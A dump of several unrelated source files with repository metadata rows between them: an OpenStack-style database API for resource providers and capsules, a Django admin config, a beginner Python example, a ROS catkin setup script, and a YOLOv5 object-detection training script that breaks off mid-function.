"""Update properties of a resource provideraccount.
:context: Request context
:param provideraccount_id: The id or uuid of a resource provideraccount.
:values: The properties to be updated
:returns: A resource provideraccount.
:raises: ResourceProvideraccountNotFound
"""
return _get_dbdriver_instance().update_resource_provideraccount(
context, provideraccount_id, values)
@profiler.trace("db")
def list_resource_classes(context, limit=None, marker=None, sort_key=None,
sort_dir=None):
"""Get matching resource classes.
Return a list of the specified columns for all resource classes.
:param context: The security context
:param limit: Maximum number of resource classes to return.
:param marker: the last item of the previous page; we
return the next
:param sort_key: Attribute by which results should be sorted.
:param sort_dir: Direction in which results should be sorted.
(asc, desc)
:returns: A list of tuples of the specified columns.
"""
return _get_dbdriver_instance().list_resource_classes(
context, limit, marker, sort_key, sort_dir)
@profiler.trace("db")
def create_resource_class(context, values):
"""Create a new resource class.
:param context: The security context
:param values: A dict containing several items used to identify
and track the resource class, and several dicts which are
passed into the Drivers when managing this resource class.
:returns: A resource class.
"""
return _get_dbdriver_instance().create_resource_class(context, values)
@profiler.trace("db")
def get_resource_class(context, resource_ident):
"""Return a resource class.
:param context: The security context
:param resource_ident: The uuid or name of a resource class.
:returns: A resource class.
"""
return _get_dbdriver_instance().get_resource_class(
context, resource_ident)
@profiler.trace("db")
def destroy_resource_class(context, resource_uuid):
"""Destroy a resource class and all associated interfaces.
:param context: Request context
:param resource_uuid: The uuid of a resource class.
"""
return _get_dbdriver_instance().destroy_resource_class(
context, resource_uuid)
@profiler.trace("db")
def update_resource_class(context, resource_uuid, values):
"""Update properties of a resource class.
:context: Request context
:param resource_uuid: The uuid of a resource class.
:values: The properties to be updated
:returns: A resource class.
:raises: ResourceClassNotFound
"""
return _get_dbdriver_instance().update_resource_class(
context, resource_uuid, values)
@profiler.trace("db")
def list_inventories(context, filters=None, limit=None, marker=None,
sort_key=None, sort_dir=None):
"""List matching inventories.
Return a list of the specified columns for all inventories that match
the specified filters.
:param context: The security context
:param filters: Filters to apply. Defaults to None.
:param limit: Maximum number of inventories to return.
:param marker: the last item of the previous page; we return the next
result set.
:param sort_key: Attribute by which results should be sorted.
:param sort_dir: Direction in which results should be sorted.
(asc, desc)
:returns: A list of tuples of the specified columns.
"""
return _get_dbdriver_instance().list_inventories(
context, filters, limit, marker, sort_key, sort_dir)
@profiler.trace("db")
def create_inventory(context, provideraccount_id, values):
"""Create a new inventory.
:param context: The security context
:param provideraccount_id: The id of a resource provideraccount.
:param values: A dict containing several items used to identify
and track the inventory, and several dicts which are
passed into the Drivers when managing this inventory.
:returns: An inventory.
"""
return _get_dbdriver_instance().create_inventory(
context, provideraccount_id, values)
@profiler.trace("db")
def get_inventory(context, inventory_ident):
"""Return a inventory.
:param context: The security context
:param inventory_ident: The id or name of an inventory.
:returns: An inventory.
"""
return _get_dbdriver_instance().get_inventory(
context, inventory_ident)
@profiler.trace("db")
def destroy_inventory(context, inventory_id):
"""Destroy an inventory and all associated interfaces.
:param context: Request context
:param inventory_id: The id of a inventory.
"""
return _get_dbdriver_instance().destroy_inventory(context, inventory_id)
@profiler.trace("db")
def update_inventory(context, inventory_id, values):
"""Update properties of an inventory.
:context: Request context
:param inventory_id: The id of an inventory.
:values: The properties to be updated
:returns: An inventory.
:raises: InventoryNotFound
"""
return _get_dbdriver_instance().update_inventory(
context, inventory_id, values)
@profiler.trace("db")
def list_allocations(context, filters=None, limit=None, marker=None,
sort_key=None, sort_dir=None):
"""List matching allocations.
Return a list of the specified columns for all allocations that match
the specified filters.
:param context: The security context
:param filters: Filters to apply. Defaults to None.
:param limit: Maximum number of allocations to return.
:param marker: the last item of the previous page; we return the next
result set.
:param sort_key: Attribute by which results should be sorted.
:param sort_dir: Direction in which results should be sorted.
(asc, desc)
:returns: A list of tuples of the specified columns.
"""
return _get_dbdriver_instance().list_allocations(
context, filters, limit, marker, sort_key, sort_dir)
@profiler.trace("db")
def create_allocation(context, values):
"""Create a new allocation.
:param context: The security context
:param values: A dict containing several items used to identify
and track the allocation, and several dicts which are
passed into the Drivers when managing this allocation.
:returns: An allocation.
"""
return _get_dbdriver_instance().create_allocation(context, values)
@profiler.trace("db")
def get_allocation(context, allocation_id):
"""Return an allocation.
:param context: The security context
:param allocation_id: The id of an allocation.
:returns: An allocation.
"""
return _get_dbdriver_instance().get_allocation(context, allocation_id)
@profiler.trace("db")
def destroy_allocation(context, allocation_id):
"""Destroy an allocation and all associated interfaces.
:param context: Request context
:param allocation_id: The id of an allocation.
"""
return _get_dbdriver_instance().destroy_allocation(context, allocation_id)
@profiler.trace("db")
def update_allocation(context, allocation_id, values):
"""Update properties of an allocation.
:context: Request context
:param allocation_id: The id of an allocation.
:values: The properties to be updated
:returns: An allocation.
:raises: AllocationNotFound
"""
return _get_dbdriver_instance().update_allocation(
context, allocation_id, values)
@profiler.trace("db")
def list_compute_nodes(context, filters=None, limit=None, marker=None,
sort_key=None, sort_dir=None):
"""List matching compute nodes.
Return a list of the specified columns for all compute nodes that match
the specified filters.
:param context: The security context
:param filters: Filters to apply. Defaults to None.
:param limit: Maximum number of compute nodes to return.
:param marker: the last item of the previous page; we return the next
result set.
:param sort_key: Attribute by which results should be sorted.
:param sort_dir: Direction in which results should be sorted.
(asc, desc)
:returns: A list of tuples of the specified columns.
"""
return _get_dbdriver_instance().list_compute_nodes(
context, filters, limit, marker, sort_key, sort_dir)
@profiler.trace("db")
def create_compute_node(context, values):
"""Create a new compute node.
:param context: The security context
:param values: A dict containing several items used to identify
and track the compute node, and several dicts which are
passed into the Drivers when managing this compute node.
:returns: A compute node.
"""
return _get_dbdriver_instance().create_compute_node(context, values)
@profiler.trace("db")
def get_compute_node(context, node_uuid):
"""Return a compute node.
:param context: The security context
:param node_uuid: The uuid of a compute node.
:returns: A compute node.
"""
return _get_dbdriver_instance().get_compute_node(context, node_uuid)
@profiler.trace("db")
def get_compute_node_by_hostname(context, hostname):
"""Return a compute node.
:param context: The security context
:param hostname: The hostname of a compute node.
:returns: A compute node.
"""
return _get_dbdriver_instance().get_compute_node_by_hostname(
context, hostname)
@profiler.trace("db")
def destroy_compute_node(context, node_uuid):
"""Destroy a compute node and all associated interfaces.
:param context: Request context
:param node_uuid: The uuid of a compute node.
"""
return _get_dbdriver_instance().destroy_compute_node(context, node_uuid)
@profiler.trace("db")
def update_compute_node(context, node_uuid, values):
"""Update properties of a compute node.
:context: Request context
:param node_uuid: The uuid of a compute node.
:values: The properties to be updated
:returns: A compute node.
:raises: ComputeNodeNotFound
"""
return _get_dbdriver_instance().update_compute_node(
context, node_uuid, values)
@profiler.trace("db")
def list_capsules(context, filters=None, limit=None, marker=None,
sort_key=None, sort_dir=None):
"""List matching capsules.
Return a list of the specified columns for all capsules that match
the specified filters.
:param context: The security context
:param filters: Filters to apply. Defaults to None.
:param limit: Maximum number of capsules to return.
:param marker: the last item of the previous page; we return the next
result set.
:param sort_key: Attribute by which results should be sorted.
:param sort_dir: Direction in which results should be sorted.
(asc, desc)
:returns: A list of tuples of the specified columns.
"""
return _get_dbdriver_instance().list_capsules(
context, filters, limit, marker, sort_key, sort_dir)
@profiler.trace("db")
def create_capsule(context, values):
"""Create a new capsule.
:param context: The security context
:param values: A dict containing several items used to identify
and track the container, and several dicts which are
passed into the Drivers when managing this container.
For example:
::
{
'uuid': uuidutils.generate_uuid(),
'restart_policy': 'always',
'project_id': '***'
}
:returns: A capsule.
"""
return _get_dbdriver_instance().create_capsule(context, values)
@profiler.trace("db")
def get_capsule_by_uuid(context, capsule_uuid):
"""Return a container.
:param context: The security context
:param capsule_uuid: The uuid of a capsule.
:returns: A capsule.
"""
return _get_dbdriver_instance().get_capsule_by_uuid(
context, capsule_uuid)
@profiler.trace("db")
def destroy_capsule(context, capsule_id):
"""Destroy a container and all associated interfaces.
:param context: Request context
:param capsule_id: The id or uuid of a capsule.
"""
return _get_dbdriver_instance().destroy_capsule(context, capsule_id)
@profiler.trace("db")
def update_capsule(context, capsule_id, values):
"""Update properties of a container.
:context: Request context
:param container_id: The id or uuid of a capsule.
:values: The properties to be updated
:returns: A capsule.
:raises: CapsuleNotFound
"""
return _get_dbdriver_instance().update_capsule(
context, capsule_id, values)
|
[
"[email protected]"
] | |
d07b6032abc8c0e3f237db652599fa785edfa2dc
|
488c20476d5528c7e942e09f4c88422f67b86853
|
/pages/admin.py
|
c117c10318328e8ee13a42ba8672a5148b952413
|
[] |
no_license
|
DaniTodorowa/DjangoToHeroku
|
e8b600cd07a5864905d6a34f08edcc31a69e4e1b
|
2df26ecc429cdca0643c174d81ff77ca5930e145
|
refs/heads/master
| 2023-02-05T17:17:32.756299 | 2020-12-21T19:10:22 | 2020-12-21T19:10:22 | 319,601,871 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 610 |
py
|
from django.contrib import admin
from pages.models import Team
from django.utils.html import format_html
class TeamAdmin(admin.ModelAdmin):
    def thumbnail(self, obj):
        return format_html('<img src="{}" width="40" style="border-radius:50px;" />'.format(obj.photo.url))
thumbnail.short_description = 'Photo'
list_display = ('id', 'thumbnail', 'first_name', 'designation', 'created_date')
list_display_links = ('id', 'thumbnail', 'first_name')
search_fields = ('first_name', 'last_name', 'designation')
list_filter = ('designation',)
admin.site.register(Team, TeamAdmin)
|
[
"[email protected]"
] | |
86cab9c16847bab1698333842dec26244522d89a
|
f1d3aabacc69d1622e6005100e9d2f139b08e4f3
|
/chapter_5/ch5-40.naming.py
|
a12c706f6277c5ce300306fa60ba5acec216f12d
|
[] |
no_license
|
tschoi6712/HelloCodingPython
|
2d49369df97c2eb3b87823ab084674f49e653043
|
0701dcb4715c4e15d049843e82042f92a5784a97
|
refs/heads/master
| 2020-07-27T08:16:43.291222 | 2019-09-17T10:44:52 | 2019-09-17T10:44:52 | 209,026,500 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 618 |
py
|
"""""""""""""""""""""""""""
Giving names to code
"""""""""""""""""""""""""""
# Code with explanatory comments
number_input = input("Enter a number> ")
radius = float(number_input)
print(2 * 3.14 * radius)  # circumference of the circle
print(3.14 * radius * radius)  # area of the circle
# Code refactored to use functions
PI = 3.14
def number_input():
    output = input("Enter a number> ")
return float(output)
def get_circumference(radius):
return 2 * PI * radius
def get_circle_area(radius):
return PI * radius * radius
radius = number_input()
print(get_circumference(radius))
print(get_circle_area(radius))
|
[
"[email protected]"
] | |
9b2b8d9a504e1ddc561e1f9a302d6c4958662e9b
|
0b751bab8d276d976e18b174e12fb26299b0a0fa
|
/cmake-build-debug/catkin_generated/generate_cached_setup.py
|
b0895402ca4143a9357dbcd96b673750652bc7f4
|
[] |
no_license
|
sukai33/stereo_camera
|
9e8fd7c7175c863f65b87c02ef3dd50ea44f5bc3
|
5d2969c51e73c5b5c0a5b4e1fd4ea39aae54d788
|
refs/heads/master
| 2022-12-31T14:39:38.244507 | 2020-10-24T14:38:07 | 2020-10-24T14:38:07 | 306,902,850 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,382 |
py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in '/home/ty/Workspace/ROS/study_ws/devel;/opt/ros/melodic'.split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/ty/Workspace/ROS/study_ws/src/stereo_camera/cmake-build-debug/devel/env.sh')
output_filename = '/home/ty/Workspace/ROS/study_ws/src/stereo_camera/cmake-build-debug/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
# print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
|
[
"[email protected]"
] | |
d4a4ee646ecfaa2e76630580842bb125b95addd2
|
60044c76b631e622edb28f3a74971ce06211fac5
|
/Python-for-Everybody/Python-Databases/Object-oriented-programming/elev.py
|
d27d8423495563ff000c23f513a2a2f4f8ec03fe
|
[] |
no_license
|
NestorMonroy/Courses-coursera
|
8d45a858c79567d74f013ac27ac33d47e43abb96
|
98ac1aa5bb0cd9da5cea5be02995d5b65c779201
|
refs/heads/master
| 2023-08-14T13:36:07.348994 | 2021-09-22T06:13:57 | 2021-09-22T06:13:57 | 327,753,375 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 99 |
py
|
usf = input('Enter the US floor number: ')
wf = int(usf) - 1
print('The non-US floor number is', wf)
|
[
"[email protected]"
] | |
efa141f731ede50aa0f398e6fba17b8f070b9ad4
|
57dccf7b8da26753b66a9eecb9eb6cd1ae5584b5
|
/yolov5/yolov5s_torch.py
|
b06dae06a62e27bac031282565d985784eafd144
|
[] |
no_license
|
vbvg2008/benchmarks
|
4b743d6b19a4d0b41fa78b8db2a3f3a3f4e86018
|
29e2e445e6701529e048e8ffa283b5b071295566
|
refs/heads/master
| 2022-12-12T21:50:51.082085 | 2022-12-06T22:09:26 | 2022-12-06T22:09:26 | 187,144,413 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 29,096 |
py
|
import math
import random
import tempfile
import cv2
import numpy as np
import torch
import torch.nn as nn
import torchvision
from albumentations import BboxParams
from torch.utils.data import Dataset
import fastestimator as fe
from fastestimator.dataset.data import mscoco
from fastestimator.op.numpyop import Delete, NumpyOp
from fastestimator.op.numpyop.meta import Sometimes
from fastestimator.op.numpyop.multivariate import CenterCrop, HorizontalFlip, LongestMaxSize, PadIfNeeded
from fastestimator.op.numpyop.univariate import ReadImage, ToArray
from fastestimator.op.tensorop import Average, TensorOp
from fastestimator.op.tensorop.model import ModelOp, UpdateOp
from fastestimator.schedule import EpochScheduler, cosine_decay
from fastestimator.trace.adapt import LRScheduler
from fastestimator.trace.io import BestModelSaver
from fastestimator.trace.metric import MeanAveragePrecision
from fastestimator.util import get_num_devices
# This dataset selects 4 images and their bboxes
class PreMosaicDataset(Dataset):
def __init__(self, mscoco_ds):
self.mscoco_ds = mscoco_ds
def __len__(self):
return len(self.mscoco_ds)
def __getitem__(self, idx):
indices = [idx] + [random.randint(0, len(self) - 1) for _ in range(3)]
samples = [self.mscoco_ds[i] for i in indices]
return {
"image1": samples[0]["image"],
"bbox1": samples[0]["bbox"],
"image2": samples[1]["image"],
"bbox2": samples[1]["bbox"],
"image3": samples[2]["image"],
"bbox3": samples[2]["bbox"],
"image4": samples[3]["image"],
"bbox4": samples[3]["bbox"]
}
class CombineMosaic(NumpyOp):
def forward(self, data, state):
image1, image2, image3, image4, bbox1, bbox2, bbox3, bbox4 = data
images = [image1, image2, image3, image4]
bboxes = [bbox1, bbox2, bbox3, bbox4]
images_new, boxes_new = self._combine_images_boxes(images, bboxes)
return images_new, boxes_new
def _combine_images_boxes(self, images, bboxes):
s = 640
yc, xc = int(random.uniform(320, 960)), int(random.uniform(320, 960))
images_new = np.full((1280, 1280, 3), fill_value=114, dtype=np.uint8)
bboxes_new = []
for idx, (image, bbox) in enumerate(zip(images, bboxes)):
h, w = image.shape[0], image.shape[1]
# place img in img4
if idx == 0: # top left
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif idx == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif idx == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif idx == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
images_new[y1a:y2a, x1a:x2a] = image[y1b:y2b, x1b:x2b]
padw, padh = x1a - x1b, y1a - y1b
for x1, y1, bw, bh, label in bbox:
x1_new = np.clip(x1 + padw, x1a, x2a)
y1_new = np.clip(y1 + padh, y1a, y2a)
x2_new = np.clip(x1 + padw + bw, x1a, x2a)
y2_new = np.clip(y1 + padh + bh, y1a, y2a)
bw_new = x2_new - x1_new
bh_new = y2_new - y1_new
if bw_new * bh_new > 1:
bboxes_new.append((x1_new, y1_new, bw_new, bh_new, label))
return images_new, bboxes_new
class HSVAugment(NumpyOp):
def __init__(self, inputs, outputs, mode="train", hsv_h=0.015, hsv_s=0.7, hsv_v=0.4):
super().__init__(inputs=inputs, outputs=outputs, mode=mode)
self.hsv_h = hsv_h
self.hsv_s = hsv_s
self.hsv_v = hsv_v
def forward(self, data, state):
img = data
r = np.random.uniform(-1, 1, 3) * [self.hsv_h, self.hsv_s, self.hsv_v] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_RGB2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
img = cv2.cvtColor(img_hsv, cv2.COLOR_HSV2RGB)
return img
class CategoryID2ClassID(NumpyOp):
def __init__(self, inputs, outputs, mode=None):
super().__init__(inputs=inputs, outputs=outputs, mode=mode)
missing_category = [66, 68, 69, 71, 12, 45, 83, 26, 29, 30]
category = [x for x in range(1, 91) if not x in missing_category]
self.mapping = {k: v for k, v in zip(category, list(range(80)))}
def forward(self, data, state):
if data.size > 0:
classes = np.array([self.mapping[int(x)] for x in data[:, -1]], dtype="float32")
data[:, -1] = classes
else:
data = np.zeros(shape=(1, 5), dtype="float32")
return data
class GTBox(NumpyOp):
def __init__(self, inputs, outputs, image_size, mode=None):
super().__init__(inputs=inputs, outputs=outputs, mode=mode)
self.image_size = image_size
self.anchor_s = [(10, 13), (16, 30), (33, 23)]
self.anchor_m = [(30, 61), (62, 45), (59, 119)]
self.anchor_l = [(116, 90), (156, 198), (373, 326)]
def forward(self, data, state):
bbox = data[np.sum(data, 1) > 0]
if bbox.size > 0:
gt_sbbox = self._generate_target(data, anchors=self.anchor_s, feature_size=80)
gt_mbbox = self._generate_target(data, anchors=self.anchor_m, feature_size=40)
gt_lbbox = self._generate_target(data, anchors=self.anchor_l, feature_size=20)
else:
gt_sbbox = np.zeros((80, 80, 3, 6), dtype="float32")
gt_mbbox = np.zeros((40, 40, 3, 6), dtype="float32")
gt_lbbox = np.zeros((20, 20, 3, 6), dtype="float32")
return gt_sbbox, gt_mbbox, gt_lbbox
def _generate_target(self, bbox, anchors, feature_size, wh_threshold=4.0):
object_boxes, label = bbox[:, :-1], bbox[:, -1]
gt_bbox = np.zeros((feature_size, feature_size, 3, 6), dtype="float32")
for object_idx, object_box in enumerate(object_boxes):
for anchor_idx, anchor in enumerate(anchors):
ratio = object_box[2:] / np.array(anchor, dtype="float32")
match = np.max(np.maximum(ratio, 1 / ratio)) < wh_threshold
if match:
center_feature_map = (object_box[:2] + object_box[2:] / 2) / self.image_size * feature_size
candidate_coords = self._get_candidate_coords(center_feature_map, feature_size)
for xc, yc in candidate_coords:
                        gt_bbox[yc, xc, anchor_idx][:4] = object_box  # use absolute x1, y1, w, h
gt_bbox[yc, xc, anchor_idx][4] = 1.0
gt_bbox[yc, xc, anchor_idx][5] = label[object_idx]
return gt_bbox
@staticmethod
def _get_candidate_coords(center_feature_map, feature_size):
xc, yc = center_feature_map
candidate_coords = [(int(xc), int(yc))]
if xc % 1 < 0.5 and xc > 1:
candidate_coords.append((int(xc) - 1, int(yc)))
if xc % 1 >= 0.5 and xc < feature_size - 1:
candidate_coords.append((int(xc) + 1, int(yc)))
if yc % 1 < 0.5 and yc > 1:
candidate_coords.append((int(xc), int(yc) - 1))
if yc % 1 >= 0.5 and yc < feature_size - 1:
candidate_coords.append((int(xc), int(yc) + 1))
return candidate_coords
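# Illustrative only (this helper is not in the original file): one absolute
# x1, y1, w, h, class box run through GTBox produces a dense target tensor
# per detection scale, shaped (feature, feature, 3 anchors, 6).
def _gtbox_shape_demo():
    op = GTBox(inputs="bbox", outputs=("gt_sbbox", "gt_mbbox", "gt_lbbox"),
               image_size=640)
    bbox = np.array([[100.0, 120.0, 50.0, 80.0, 7.0]], dtype="float32")
    # shapes: (80, 80, 3, 6), (40, 40, 3, 6), (20, 20, 3, 6)
    return [t.shape for t in op.forward(bbox, state={})]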
# Reusable convolution
class ConvBlock(nn.Module):
def __init__(self, c1, c2, k=1, s=1): # ch_in, ch_out, kernel, stride
super().__init__()
self.conv = nn.Conv2d(c1, c2, k, stride=s, padding=k // 2, bias=False)
self.bn = nn.BatchNorm2d(c2, eps=1e-3, momentum=0.03)
self.act = nn.SiLU()
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
x = self.act(x)
return x
# Standard bottleneck
class Bottleneck(nn.Module):
def __init__(self, c1, c2, shortcut=True): # ch_in, ch_out, shortcut
super().__init__()
self.cv1 = ConvBlock(c1, c2, 1)
self.cv2 = ConvBlock(c2, c2, 3)
self.add = shortcut and c1 == c2
def forward(self, x):
out = self.cv1(x)
out = self.cv2(out)
if self.add:
out = out + x
return out
# CSP Bottleneck with 3 convolutions
class C3(nn.Module):
def __init__(self, c1, c2, n=1, shortcut=True): # ch_in, ch_out, num_repeat, shortcut
super().__init__()
self.cv1 = ConvBlock(c1, c2 // 2)
self.cv2 = ConvBlock(c1, c2 // 2)
self.m = nn.Sequential(*[Bottleneck(c2 // 2, c2 // 2, shortcut) for _ in range(n)])
self.cv3 = ConvBlock(c2, c2)
def forward(self, x):
out1 = self.cv1(x)
out1 = self.m(out1)
out2 = self.cv2(x)
out = torch.cat([out1, out2], dim=1)
out = self.cv3(out)
return out
# Focus wh information into c-space
class Focus(nn.Module):
def __init__(self, c1, c2, k=1):
super().__init__()
self.conv = ConvBlock(c1 * 4, c2, k)
def forward(self, x):
# x(b,c,w,h) -> y(b,4c,w/2,h/2)
x = torch.cat([x[..., ::2, ::2], x[..., 1::2, ::2], x[..., ::2, 1::2], x[..., 1::2, 1::2]], 1)
x = self.conv(x)
return x
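# Sanity-check sketch (added for illustration, not in the original source):
# the pixel-unshuffle slicing above turns (B, C, H, W) into (B, 4C, H/2, W/2)
# before the convolution, so Focus(3, 32, 3) maps 1x3x640x640 to 1x32x320x320.
def _focus_shape_demo():
    x = torch.zeros(1, 3, 640, 640)
    return Focus(3, 32, 3)(x).shape  # torch.Size([1, 32, 320, 320])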
# Spatial pyramid pooling layer used in YOLOv3-SPP
class SPP(nn.Module):
def __init__(self, c1, c2, k=(5, 9, 13)):
super().__init__()
self.cv1 = ConvBlock(c1, c1 // 2, 1, 1)
self.cv2 = ConvBlock(c1 // 2 * (len(k) + 1), c2, 1, 1)
self.m = nn.ModuleList([nn.MaxPool2d(kernel_size=x, stride=1, padding=x // 2) for x in k])
def forward(self, x):
x = self.cv1(x)
x = torch.cat([x] + [m(x) for m in self.m], 1)
x = self.cv2(x)
return x
class YoloV5(nn.Module):
def __init__(self, w, h, c, num_class=80):
super().__init__()
assert w % 32 == 0 and h % 32 == 0, "image width and height must be a multiple of 32"
self.num_class = num_class
self.focus = Focus(c, 32, 3)
self.conv1 = ConvBlock(32, 64, 3, 2)
self.c3_1 = C3(64, 64)
self.conv2 = ConvBlock(64, 128, 3, 2)
self.c3_2 = C3(128, 128, 3)
self.conv3 = ConvBlock(128, 256, 3, 2)
self.c3_3 = C3(256, 256, 3)
self.conv4 = ConvBlock(256, 512, 3, 2)
self.spp = SPP(512, 512)
self.c3_4 = C3(512, 512, shortcut=False)
self.conv5 = ConvBlock(512, 256)
self.up1 = nn.Upsample(size=None, scale_factor=2, mode="nearest")
self.c3_5 = C3(512, 256, shortcut=False)
self.up2 = nn.Upsample(size=None, scale_factor=2, mode="nearest")
self.conv6 = ConvBlock(256, 128)
self.c3_6 = C3(256, 128, shortcut=False)
self.conv7 = ConvBlock(128, 128, 3, 2)
self.c3_7 = C3(256, 256, shortcut=False)
self.conv8 = ConvBlock(256, 256, 3, 2)
self.c3_8 = C3(512, 512, shortcut=False)
self.conv17 = nn.Conv2d(128, (num_class + 5) * 3, 1)
self.conv20 = nn.Conv2d(256, (num_class + 5) * 3, 1)
self.conv23 = nn.Conv2d(512, (num_class + 5) * 3, 1)
self.stride = torch.tensor([8, 16, 32])
self._initialize_detect_bias()
def _initialize_detect_bias(self):
for layer, stride in zip([self.conv17, self.conv20, self.conv23], self.stride):
b = layer.bias.view(3, -1) # conv.bias(255) to (3,85)
b.data[:, 4] += math.log(8 / (640 / stride)**2) # obj (8 objects per 640 image)
b.data[:, 5:] += math.log(0.6 / (self.num_class - 0.99)) # cls
layer.bias = torch.nn.Parameter(b.view(-1), requires_grad=True)
def forward(self, x):
x = self.focus(x)
x = self.conv1(x)
x = self.c3_1(x)
x = self.conv2(x)
x_4 = self.c3_2(x)
x = self.conv3(x_4)
x_6 = self.c3_3(x)
x = self.conv4(x_6)
x = self.spp(x)
x = self.c3_4(x)
x_10 = self.conv5(x)
x = self.up1(x_10)
x = torch.cat([x, x_6], dim=1)
x = self.c3_5(x)
x_14 = self.conv6(x)
x = self.up2(x_14)
x = torch.cat([x, x_4], dim=1)
x_17 = self.c3_6(x)
x = self.conv7(x_17)
x = torch.cat([x, x_14], dim=1)
x_20 = self.c3_7(x)
x = self.conv8(x_20)
x = torch.cat([x, x_10], dim=1)
x_23 = self.c3_8(x)
out_17 = self.conv17(x_17) # B, 255, h/8, w/8 - P3 stage
out_20 = self.conv20(x_20) # B, 255, h/16, w/16 - P4 stage
out_23 = self.conv23(x_23) # B, 255, h/32, w/32 - P5 stage
out = [out_17, out_20, out_23]
for i, x in enumerate(out):
bs, _, ny, nx = x.shape # x(bs,255,20,20) to x(bs,20,20,3,85)
out[i] = x.view(bs, 3, self.num_class + 5, ny, nx).permute(0, 3, 4, 1, 2).contiguous()
return out
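# Illustrative shape check (helper not in the original file): with a 640x640
# input the three heads come back as (B, 80, 80, 3, 85), (B, 40, 40, 3, 85)
# and (B, 20, 20, 3, 85), i.e. strides 8, 16 and 32 with 3 anchors per cell.
def _yolov5_head_shapes():
    model = YoloV5(w=640, h=640, c=3)
    return [o.shape for o in model(torch.zeros(1, 3, 640, 640))]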
class RescaleTranspose(TensorOp):
def forward(self, data, state):
data = data.permute(0, 3, 1, 2) / 255
return data
class DecodePred(TensorOp):
def __init__(self, inputs, outputs, mode=None):
super().__init__(inputs=inputs, outputs=outputs, mode=mode)
self.strides = [8, 16, 32]
self.num_anchor = 3
self.width, self.height = 640, 640
anchor_s = [(10, 13), (16, 30), (33, 23)]
anchor_m = [(30, 61), (62, 45), (59, 119)]
anchor_l = [(116, 90), (156, 198), (373, 326)]
self.anchors = self.create_anchor(anchor_s, anchor_m, anchor_l, self.strides)
self.grids = self.create_grid(self.strides, self.num_anchor)
def build(self, framework, device):
self.anchors = [anchor.to(device) for anchor in self.anchors]
self.grids = [grid.to(device) for grid in self.grids]
def create_grid(self, strides, num_anchor):
grids = []
for stride in strides:
x_coor = [stride * i for i in range(self.width // stride)]
y_coor = [stride * i for i in range(self.height // stride)]
xx, yy = np.meshgrid(x_coor, y_coor)
xx, yy = np.float32(xx), np.float32(yy)
xx, yy = np.stack([xx] * num_anchor, axis=-1), np.stack([yy] * num_anchor, axis=-1)
grids.append(torch.Tensor(np.stack([xx, yy], axis=-1)))
return grids
def create_anchor(self, anchor_s, anchor_m, anchor_l, strides):
anchors = []
for anchor, stride in zip([anchor_s, anchor_m, anchor_l], strides):
feature_size_x, feature_size_y = self.width // stride, self.height // stride
anchor = np.array(anchor, dtype="float32").reshape((1, 1, 3, 2))
anchor = np.tile(anchor, [feature_size_y, feature_size_x, 1, 1])
anchors.append(torch.Tensor(anchor))
return anchors
def forward(self, data, state):
conv_sbbox = self.decode(data[0], self.grids[0], self.anchors[0], self.strides[0])
conv_mbbox = self.decode(data[1], self.grids[1], self.anchors[1], self.strides[1])
conv_lbbox = self.decode(data[2], self.grids[2], self.anchors[2], self.strides[2])
return conv_sbbox, conv_mbbox, conv_lbbox
def decode(self, conv_bbox, grid, anchor, stride):
batch_size = conv_bbox.size(0)
grid, anchor = torch.unsqueeze(grid, 0), torch.unsqueeze(anchor, 0)
grid, anchor = grid.repeat(batch_size, 1, 1, 1, 1), anchor.repeat(batch_size, 1, 1, 1, 1)
bbox_pred, conf_pred, cls_pred = torch.sigmoid(conv_bbox[..., 0:4]), conv_bbox[..., 4:5], conv_bbox[..., 5:]
xcyc_pred, wh_pred = bbox_pred[..., 0:2], bbox_pred[..., 2:4]
xcyc_pred = (xcyc_pred * 2 - 0.5) * stride + grid
wh_pred = (wh_pred * 2)**2 * anchor
x1y1_pred = xcyc_pred - wh_pred / 2
result = torch.cat([x1y1_pred, wh_pred, conf_pred, cls_pred], dim=-1)
return result
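# Minimal sketch (assumption, not part of the original training script): the
# decode step keeps the grid layout and only rewrites the last dimension into
# absolute x1, y1, w, h, an objectness logit and 80 class logits.
def _decode_shape_demo():
    op = DecodePred(inputs=("pred_s", "pred_m", "pred_l"),
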